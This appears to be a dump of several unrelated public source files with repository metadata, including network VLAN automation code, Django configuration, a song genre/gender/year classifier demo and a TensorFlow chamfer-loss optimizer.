interface.interface, network.name, switch.device
)
)
network_vars.add("INTERFACE_ID", interface.interface)
network_vars.add("DESCRIPTION", interface.description)
network_vars.add("MODE", interface.mode)
network_vars.add("MTU_SIZE", "9216")
self.log.info("network_vars=", network_vars)
template.apply("tenant_network_interface", network_vars)
# PHASE Port-Channels
for port_channel in switch.port_channel:
self.log.info(
"Configuring PortChannel {} for Network {} on Switch {}".format(
port_channel.portchannel_id, network.name, switch.device
)
)
network_vars.add("PORTCHANNEL_ID", port_channel.portchannel_id)
network_vars.add("DESCRIPTION", port_channel.description)
network_vars.add("MODE", port_channel.mode)
network_vars.add("VPC", "")
self.log.info("network_vars=", network_vars)
template.apply("portchannel-interface", network_vars)
# PHASE Port-Channel Member Interfaces
for interface in port_channel.interface:
self.log.info(
"Adding Interface {} to Port-Channel {} on Network {} on Switch {}.".format(
interface.interface,
port_channel.portchannel_id,
network.name,
switch.device,
)
)
network_vars.add("INTERFACE_ID", interface.interface)
self.log.info("network_vars=", network_vars)
template.apply("portchannel-member-interface", network_vars)
# PHASE Switch Pair connections
for pair in network.connections.switch_pair:
self.log.info(
"Adding Connections for Network {} on Switch Pair {}".format(
network.name, pair.name
)
)
# Lookup Pair from Fabric
# switch_pairs = root.vlan_fabric[service.fabric].switch_pair
this_pair = root.vlan_fabric[service.fabric].switch_pair[pair.name]
self.log.info(
"Primary {} Secondary {}".format(
this_pair.primary, this_pair.secondary
)
)
# Nexus Leaf Pairs Always False
disable_trunk_negotiation = False
network_vars.add("DISABLE_TRUNK_NEGOTIATION", disable_trunk_negotiation)
# PHASE Interfaces
for interface in pair.interface:
self.log.info(
"Configuring Intereface {} for Network {} on Pair {}".format(
interface.interface, network.name, this_pair.name
)
)
network_vars.add("INTERFACE_ID", interface.interface)
network_vars.add("DESCRIPTION", interface.description)
network_vars.add("MODE", interface.mode)
network_vars.add("MTU_SIZE", "9216")
# Primary
network_vars.add("DEVICE_NAME", this_pair.primary)
self.log.info("network_vars=", network_vars)
template.apply("tenant_network_interface", network_vars)
if this_pair.secondary:
# Secondary
network_vars.add("DEVICE_NAME", this_pair.secondary)
self.log.info("network_vars=", network_vars)
template.apply("tenant_network_interface", network_vars)
# PHASE Port-Channels
for port_channel in pair.port_channel:
self.log.info(
"Configuring Port-Channel {} for Network {} on Pair {}".format(
port_channel.portchannel_id, network.name, this_pair.name
)
)
network_vars.add("PORTCHANNEL_ID", port_channel.portchannel_id)
network_vars.add("DESCRIPTION", port_channel.description)
network_vars.add("MODE", port_channel.mode)
network_vars.add("MTU_SIZE", "9216")
network_vars.add("VPC", True)
# Primary
network_vars.add("DEVICE_NAME", this_pair.primary)
self.log.info("network_vars=", network_vars)
template.apply("portchannel-interface", network_vars)
# Secondary
network_vars.add("DEVICE_NAME", this_pair.secondary)
self.log.info("network_vars=", network_vars)
template.apply("portchannel-interface", network_vars)
# PHASE Port-Channel Member Interfaces
for interface in port_channel.interface:
self.log.info(
"Adding Interface {} to Port-Channel {} on Network {} on Pair {}.".format(
interface.interface,
port_channel.portchannel_id,
network.name,
this_pair.name,
)
)
network_vars.add("INTERFACE_ID", interface.interface)
# Primary
network_vars.add("DEVICE_NAME", this_pair.primary)
self.log.info("network_vars=", network_vars)
template.apply("portchannel-member-interface", network_vars)
# Secondary
network_vars.add("DEVICE_NAME", this_pair.secondary)
self.log.info("network_vars=", network_vars)
template.apply("portchannel-member-interface", network_vars)
# PHASE Fabric Interconnects
for fabric_interconnect in fabric_interconnects:
self.log.info(
"Configuring Network {} on Fabric Interconnect {}".format(
network.name, fabric_interconnect.device
)
)
ucs_vars = ncs.template.Variables()
ucs_vars.add("DEVICE_NAME", fabric_interconnect.device)
ucs_vars.add("VLAN_NAME", network.name)
ucs_vars.add("VLAN_ID", network.vlanid)
# PHASE - Add VLAN to Configuration
self.log.info(
"Adding VLAN {} ({}) on Fabric Interconnect {}".format(
network.name, network.vlanid, fabric_interconnect.device
)
)
self.log.info("ucs_vars=", ucs_vars)
template.apply("ucs-vlan-setup", ucs_vars)
# PHASE - Update vnic-templates
for vnic_template in fabric_interconnect.vnic_template_trunks:
ucs_vars.add("UCS_ORG", vnic_template.org)
ucs_vars.add("UCS_VNIC_TEMPLATE", vnic_template.vnic_template)
self.log.info(
"Adding VLAN {} ({}) to vnic-template {}/{} on Fabric Interconnect {}".format(
network.name,
network.vlanid,
vnic_template.org,
vnic_template.vnic_template,
fabric_interconnect.device,
)
)
self.log.info("ucs_vars=", ucs_vars)
template.apply("ucs-vnic-template-vlan-setup", ucs_vars)
            # PHASE - VMware Distributed Virtual Switch
for vswitch in vswitches:
self.log.info(
"Configuring Network {} on DVS: {}/{}/{}".format(
network.name, vswitch.vcenter, vswitch.datacenter, vswitch.dvs
)
)
dvs_vars = ncs.template.Variables()
dvs_vars.add("DEVICE_NAME", vswitch.vcenter)
dvs_vars.add("VLAN_NAME", network.name)
dvs_vars.add("VLAN_ID", network.vlanid)
dvs_vars.add("VMWARE_DATACENTER", vswitch.datacenter)
dvs_vars.add("VMWARE_DVS", vswitch.dvs)
self.log.info("dvs_vars=", dvs_vars)
template.apply("vmware-dvs-portprofile-setup", dvs_vars)
# The pre_modification() and post_modification() callbacks are optional,
# and are invoked outside FASTMAP. pre_modification() is invoked before
# create, update, or delete of the service, as indicated by the enum
# ncs_service_operation op parameter. Conversely
# post_modification() is invoked after create, update, or delete
# of the service. These functions can be useful e.g. for
# allocations that should be stored and existing also when the
# service instance is removed.
# @Service.pre_lock_create
# def cb_pre_lock_create(self, tctx, root, service, proplist):
# self.log.info('Service plcreate(service=', service._path, ')')
# @Service.pre_modification
# def cb_pre_modification(self, tctx, op, kp, root, proplist):
# self.log.info('Service premod(service=', kp, ')')
# @Service.post_modification
# def cb_post_modification(self, tctx, op, kp, root, proplist):
# self.log.info('Service premod(service=', kp, ')')
|
[
"hank.preston@gmail.com"
] |
hank.preston@gmail.com
|
6d533a22fd7ba72d63f3d689c3fd96da7fecc29a
|
dc893a23ea659a9aff10c972202abae113a31f8d
|
/causal_inference/code/CVPR2012_slidingwindow_action_detection/screen_30_9406.py
|
9e3ea6fc8e19ee4e2ff4b281d8a8a25b4cf04d4f
|
[] |
no_license
|
scotfang/research
|
f28ff4cdcdb579839fddabc7d77a31b324f45a78
|
424e0dce9e5083e75ac49a33765d1a9d7c2878e9
|
refs/heads/master
| 2021-01-01T17:17:15.633209
| 2014-05-12T18:20:43
| 2014-05-12T18:20:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 166
|
py
|
temporal_parses = {
704: { "usecomputer_START": {"energy": -0.000000, "agent": "uuid1"} },
880: { "usecomputer_END": {"energy": -0.000000, "agent": "uuid1"} },
},
|
[
"scotfang@gmail.com"
] |
scotfang@gmail.com
|
527e23b43539f94bb5c055d96fa9cee41d724973
|
889949036343859dba198e2640f4d5cbed396673
|
/insta_project/insta_project/urls.py
|
c6dc4921aed5fc7c69771c533c7c81f4f54e3772
|
[] |
no_license
|
RiyazUlHaque/s3Django
|
8d7f096d6a560db2e6ee37328e4848dcc8128a7d
|
2e8b52330c04345c6e7e0edc3e180a540f5dd630
|
refs/heads/master
| 2023-01-24T22:02:32.129575
| 2020-12-01T20:48:52
| 2020-12-01T20:48:52
| 290,001,212
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,036
|
py
|
"""insta_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.conf import settings # new
from django.urls import path, include # new
from django.conf.urls.static import static # new
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('posts.urls')), # new
]
if settings.DEBUG: # new
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
[
"riyazulhaque922@gmail.com"
] |
riyazulhaque922@gmail.com
|
8730d58aed4341d6bb3e7fc6860ff9e1ad2d13ce
|
16f524cf688f3cc673883544bc8af4fed8bb0436
|
/demo.py
|
fdd0db6670f51bbb78674b2905ea0ae7ddb4e46c
|
[] |
no_license
|
Alroomi/Song-Classification
|
de2fff43169eba4024f4e4111d9d80a5b7ad7098
|
066ebf50b27a4c25a19da3bc4df05d9a41a5efac
|
refs/heads/master
| 2021-05-06T13:32:00.777472
| 2017-12-05T20:36:26
| 2017-12-05T20:36:26
| 113,230,163
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,694
|
py
|
import os, os.path, sys
import h5py
import numpy as np
import pickle as pkl
from configs_genre import gen_config as genre_config
from configs_gender import gen_config as gender_config
from configs_year import gen_config as year_config
from models.ann import Classifier
from models.cnn import CNNClassifier
from feature_extractor import FeatureExtractor
from sklearn.utils.extmath import softmax
from utils import parse_csv_list_file
def load_models(task):
if task.startswith('Year'):
cfgs_1, nn_cfgs_1 = year_config(task, 'ann', 'decade')
cfgs_2, nn_cfgs_2 = year_config(task, 'cnn', 'decade')
elif task.startswith('Genre'):
cfgs_1, nn_cfgs_1 = genre_config(task, 'ann')
cfgs_2, nn_cfgs_2 = genre_config(task, 'cnn')
elif task.startswith('Gender'):
cfgs_1, nn_cfgs_1 = gender_config(task, 'ann')
cfgs_2, nn_cfgs_2 = gender_config(task, 'cnn')
ann = Classifier(nn_cfgs_1, log_dir=None)
ann.restore('%s-%d' %(nn_cfgs_1['tf_sess_path'], cfgs_1['n_iters']))
cnn = CNNClassifier(nn_cfgs_2, log_dir=None)
cnn.restore('%s-%d' %(nn_cfgs_2['tf_sess_path'], cfgs_2['n_iters']))
return ann, cnn
def init_ft(task):
if task.startswith('Year'):
cfgs, nn_cfgs = year_config(task, 'ann', 'decade')
elif task.startswith('Genre'):
cfgs, nn_cfgs = genre_config(task, 'ann')
elif task.startswith('Gender'):
cfgs, nn_cfgs = gender_config(task, 'ann')
ft1 = FeatureExtractor(cfgs['feature_list'], cfgs['feature_pool'], cfgs['l2_norm'], cfgs['sr'], 1, cfgs['stride'])
ft2 = FeatureExtractor(['melspectrogram'], 'none', cfgs['l2_norm'], cfgs['sr'], 3, cfgs['stride'])
return ft1, ft2
def get_utils(task):
if task.startswith('Year'):
cfgs, nn_cfgs = year_config(task, 'ann', 'decade')
elif task.startswith('Genre'):
cfgs, nn_cfgs = genre_config(task, 'ann')
elif task.startswith('Gender'):
cfgs, nn_cfgs = gender_config(task, 'ann')
_, cls_to_id, id_to_cls = parse_csv_list_file(cfgs['train_list_fname'])
ann_mean = np.load('means/mean_%s_%s.npy' %(task,'ann'))
cnn_mean = np.load('means/mean_%s_%s.npy' %(task,'cnn'))
return cls_to_id, id_to_cls, ann_mean, cnn_mean
def build_label_map_year2decade(cls_to_id):
new_cls_to_id = dict({})
new_id_to_cls = dict({})
old_to_new_ids = dict({})
counter = 0
years = cls_to_id.keys()
years = sorted(years)
for year in years:
decade = '%d0s' %int(np.floor(int(year) / 10))
if decade not in new_cls_to_id:
new_cls_to_id[decade] = counter # '19x0s' -> 0 ...
new_id_to_cls[counter] = decade # 0 -> '19x0s'
counter += 1
old_to_new_ids[cls_to_id[year]] = new_cls_to_id[decade]
num_ids = len(new_id_to_cls.keys())
return old_to_new_ids, new_id_to_cls, num_ids
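# Worked example with hypothetical labels: cls_to_id = {'1985': 0, '1992': 1, '1998': 2}
# yields new_id_to_cls = {0: '1980s', 1: '1990s'}, old_to_new_ids = {0: 0, 1: 1, 2: 1}
# and num_ids = 2, i.e. the per-year class ids are collapsed into decade class ids.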
def sum_score(scores):
sum_scores = scores.sum(axis=0)
final_pred = np.argmax(sum_scores)
return final_pred
def ensemble(scores1, scores2):
ss1 = scores1.sum(axis=0).reshape([1,-1])
ss2 = scores2.sum(axis=0).reshape([1,-1])
ss1 = softmax(ss1)
ss2 = softmax(ss2)
final_scores = ss1 + ss2
final_pred = np.argmax(final_scores)
return final_pred
def predict_genre(feat1, feat2, ann, cnn, cls_to_id, id_to_cls, mean1, mean2):
# ann
preds1, scores1 = ann.predict(feat1 - mean1)
final_pred1 = sum_score(scores1)
# cnn
preds2, scores2 = cnn.predict(feat2 - mean2)
final_pred2 = sum_score(scores2)
# ensemble
ensemble_pred = ensemble(scores1, scores2)
print('--------------Genre Prediction--------------')
print('FeatureExtraction1: %s' %id_to_cls[final_pred1])
print('FeatureExtraction2: %s' %id_to_cls[final_pred2])
print('Ensemble: %s' %id_to_cls[ensemble_pred])
def predict_gender(feat1, feat2, ann, cnn, cls_to_id, id_to_cls, mean1, mean2):
# ann
preds1, scores1 = ann.predict(feat1 - mean1)
final_pred1 = sum_score(scores1)
# cnn
preds2, scores2 = cnn.predict(feat2 - mean2)
final_pred2 = sum_score(scores2)
# ensemble
ensemble_pred = ensemble(scores1, scores2)
print('--------------Gender Prediction--------------')
print('FeatureExtraction1: %s' %id_to_cls[final_pred1])
print('FeatureExtraction2: %s' %id_to_cls[final_pred2])
print('Ensemble: %s' %id_to_cls[ensemble_pred])
def predict_year(feat1, feat2, ann, cnn, cls_to_id, id_to_cls, mean1, mean2):
# ann
preds1, scores1 = ann.predict(feat1 - mean1)
final_pred1 = sum_score(scores1)
# cnn
preds2, scores2 = cnn.predict(feat2 - mean2)
final_pred2 = sum_score(scores2)
# ensemble
ensemble_pred = ensemble(scores1, scores2)
print('--------------Year Prediction--------------')
print('FeatureExtraction1: %s (%s)' %(id_to_cls[final_pred1], id_to_cls[final_pred1]))
print('FeatureExtraction2: %s (%s)' %(id_to_cls[final_pred2], id_to_cls[final_pred2]))
print('Ensemble: %s (%s)' %(id_to_cls[ensemble_pred], id_to_cls[ensemble_pred]))
if __name__ == '__main__':
    assert len(sys.argv) == 2, 'Path to the folder containing the songs must be provided'
song_folder = sys.argv[1]
# ./data/6th Nov/genre/songs
genre_ann, genre_cnn = load_models('Genre_fold_1')
genre_cls_to_id, genre_id_to_cls, genre_ann_mean, genre_cnn_mean = get_utils('Genre_fold_1')
ft1, ft2 = init_ft('Genre_fold_1')
gender_ann, gender_cnn = load_models('Gender_fold_1')
gender_cls_to_id, gender_id_to_cls, gender_ann_mean, gender_cnn_mean = get_utils('Gender_fold_1')
year_ann, year_cnn = load_models('Year_fold_1')
year_cls_to_id, year_id_to_cls, year_ann_mean, year_cnn_mean = get_utils('Year_fold_1')
year_cls_to_id, year_id_to_cls, _ = build_label_map_year2decade(year_cls_to_id)
filenames = os.listdir(song_folder)
for fname in filenames:
fname = fname.strip()
if not fname.endswith('.mp3'):
continue
print('--------------------------------------------')
print(fname)
print('Extracting Feature 1 ...')
feat1 = ft1.extract_feature(os.path.join(song_folder, fname))
print('Extracting Feature 2 ...')
feat2 = ft2.extract_spectrogram(os.path.join(song_folder, fname))
print('Done.')
predict_genre(feat1, feat2, genre_ann, genre_cnn, genre_cls_to_id, genre_id_to_cls, genre_ann_mean, genre_cnn_mean)
predict_gender(feat1, feat2, gender_ann, gender_cnn, gender_cls_to_id, gender_id_to_cls, gender_ann_mean, gender_cnn_mean)
predict_year(feat1, feat2, year_ann, year_cnn, year_cls_to_id, year_id_to_cls, year_ann_mean, year_cnn_mean)
input("Press Enter to continue...")
|
[
"31593907+Alroomi@users.noreply.github.com"
] |
31593907+Alroomi@users.noreply.github.com
|
23ad3618568496efcd28687742ed0ff95e48fa3b
|
ad29d032cc11757584629d221dc4748cd5d8c5eb
|
/optimizer.py
|
e14ba389c1a30a92099b2e03553d99a932b71a44
|
[] |
no_license
|
joalmei/Img2Mesh
|
58b26354f36081e474d20b88f2ec0d0d47ee2add
|
7299c069ac0f88e9ff9d29ece939ca4df1c05016
|
refs/heads/master
| 2022-03-24T11:21:36.882254
| 2019-12-05T13:56:17
| 2019-12-05T13:56:17
| 222,305,444
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,503
|
py
|
import tensorflow as tf
from tensorflow import keras
import tensorflow.keras.backend as K
import time
import random
import matplotlib.pyplot as plt
from operator import itemgetter
from losses import chamfer_loss
from tools.optim_tools import shuffle_tensors
# ==============================================================================
# custom optimizer for chamfer_loss
# using Adam optimization algorithm
class Optimizer:
def __init__ (self, model, learning_rate=0.001):
self.model = model
self.optimizer = keras.optimizers.Adam(learning_rate=learning_rate)
# ==========================================================================
def loss (self, xs, ys):
out = []
ys_ = self.model(xs)
for y, y_ in zip(ys, ys_):
out.append(chamfer_loss(y, y_))
return tf.stack(out)
# =========================================================================
def predict (self, X):
return self.model(X)
# =========================================================================
def test (self, X, Y):
return self.loss(X, Y)
# =========================================================================
def grad (self, xs, ys):
with tf.GradientTape() as tape:
loss_value = self.loss(xs, ys)
return loss_value, tape.gradient(loss_value, self.model.trainable_variables)
# =========================================================================
# trains the network for num_epochs epochs or until min_step is achieved
def train_epochs (self, X, Y, batches,
num_epochs=2000, min_error=1e-3, min_step=1e-9,
checkpoint_callback=None, check_step=1):
train_loss_results = []
for epoch in range(num_epochs):
loss_value, nbatch, prevbatch, start_time = 0, 0, 0, time.time()
X, Y = shuffle_tensors(X, Y)
print("batches: ", end='')
for batch in batches:
nbatch = nbatch + 1
if (int(10*nbatch/len(batches)) > prevbatch):
prevbatch = int(10*nbatch/len(batches))
print('.', end='')
# optimize the model
lossv, grads = self.grad(X[batch], Y[batch])
self.optimizer.apply_gradients(zip(grads, self.model.trainable_variables))
# end epoch
loss_value = K.mean(lossv) + loss_value
loss_value = loss_value / len(batches)
train_loss_results.append(loss_value)
print(' ', end=' ')
if (epoch % check_step == 0):
print("epoch : ", epoch,
" ; loss = ", float(loss_value),
" (", time.time() - start_time ,"secs)")
if (checkpoint_callback != None):
checkpoint_callback(self.model)
if (epoch % check_step == 0 and epoch > 1 and loss_value < min_error):
print('min_error achieved at ', float(loss_value))
return train_loss_results, True
return train_loss_results, False
# =========================================================================
# trains the network max_repet times for num_epochs
def train (self, X, Y, batches,
min_error=1e-3, min_step=1e-3, plot=False,
checkpoint_callback=None,
num_epochs=10,
max_repets=10):
losses = []
interrupt = False
repet = 0
while (not interrupt):
repet = repet + 1
if (repet > max_repets):
break
print("========================================================================")
loss, interrupt = self.train_epochs(X, Y, batches,
num_epochs=num_epochs,
min_error=min_error,
min_step=min_step,
checkpoint_callback=checkpoint_callback)
losses.extend(loss)
if (plot == True):
plt.plot(losses)
plt.plot(loss, label=str(repet))
plt.show()
print("Trainning finished!")
if (plot == True):
plt.plot(losses)
plt.show()
return losses
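# For reference only: chamfer_loss is imported from this repo's losses.py and is not
# shown above. The sketch below is a typical symmetric chamfer distance between two
# point sets of shape (N, 3) and (M, 3); the name and exact form are illustrative.
def _chamfer_distance_reference(a, b):
    import numpy as np  # local import keeps the sketch self-contained
    d = np.linalg.norm(a[:, None, :] - b[None, :, :], axis=-1)  # (N, M) pairwise distances
    return float(d.min(axis=1).mean() + d.min(axis=0).mean())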
|
[
"jv.aaguiar@gmail.com"
] |
jv.aaguiar@gmail.com
|
3d7c1eb1ed4087a49c6fea97eca35696c9b6f325
|
cf9484ee1147172138c702a95a6fe2fe862a9f58
|
/TravelBlog/asgi.py
|
dd4c115a3066fe06bd1aaf312488f8a7c6dca6a5
|
[] |
no_license
|
crankshaft1099/Travel-Blog
|
428ab46760c6546ae44a9f3d3d756a0daae0d6b6
|
4c6c2a8399946a02cedc38e9e4a1e80279d90869
|
refs/heads/main
| 2023-03-11T22:01:16.704635
| 2021-03-05T17:48:13
| 2021-03-05T17:48:13
| 344,887,935
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 413
|
py
|
"""
ASGI config for TravelBlog project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'TravelBlog.settings')
application = get_asgi_application()
|
[
"noreply@github.com"
] |
noreply@github.com
|
e0cc11f8c458f81ac2d8596c43ac6e0a26ec20a7
|
0692fe679d6ecd9a8b004c5223937f03f374237a
|
/vkcpa/migrations/0001_initial.py
|
930653a5f9df40bc70dcebc3bb7814a6db820c0f
|
[] |
no_license
|
DmitryVesennyi/vkcpa
|
0a23c411ca5e417e2d646b9f3a7ef477194731a1
|
21540f48ffea2f8333a92441beecf6696db4a508
|
refs/heads/master
| 2021-09-05T00:27:42.740029
| 2018-01-23T03:58:25
| 2018-01-23T03:58:25
| 118,547,068
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 948
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Users',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('user_id', models.BigIntegerField()),
('name', models.CharField(max_length=255, verbose_name='\u0418\u043c\u044f')),
('surname', models.CharField(max_length=255, verbose_name='\u0424\u0430\u043c\u0438\u043b\u0438\u044f', blank=True)),
('start_date', models.DateTimeField(auto_now_add=True)),
('hashmd5', models.CharField(max_length=255, verbose_name='\u0425\u0435\u0448')),
],
options={
},
bases=(models.Model,),
),
]
|
[
"press.83@list.ru"
] |
press.83@list.ru
|